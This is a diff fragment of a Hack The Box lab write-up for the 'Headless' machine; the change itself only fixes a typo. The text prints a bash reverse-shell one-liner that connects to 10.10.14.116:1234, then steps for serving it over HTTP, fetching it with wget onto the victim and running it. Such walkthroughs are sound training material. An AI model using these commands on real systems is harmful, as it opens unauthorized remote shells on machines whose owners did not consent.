cyb3ritic/HTB-machines-and-challenges-writeups/machines/headless.md

 echo "bash -i >& /dev/tcp/10.10.14.116/1234 0>&1;" > reverse_shell.sh
 chmod +x reverse_shell.sh
 ```
-step 2 => start the python server with `python -m http.server` and then use `wget http://<ipaddress>port/`to upload reverse shell on victims machine.
+step 2 => start the python server with `python -m http.server` and then use `wget http://<ipaddress>port/`to upload reverse shell on victim's machine.
 ![upload reverse shell](../.medias/headless/upload_reverseshell.jpg)

 Now since the reverse shell is uploaded, lets run the script using `bash reverse_shell.sh` command.
 We got the reverse shell.
 Now again exploring through the file system we can easily acquire the user flag.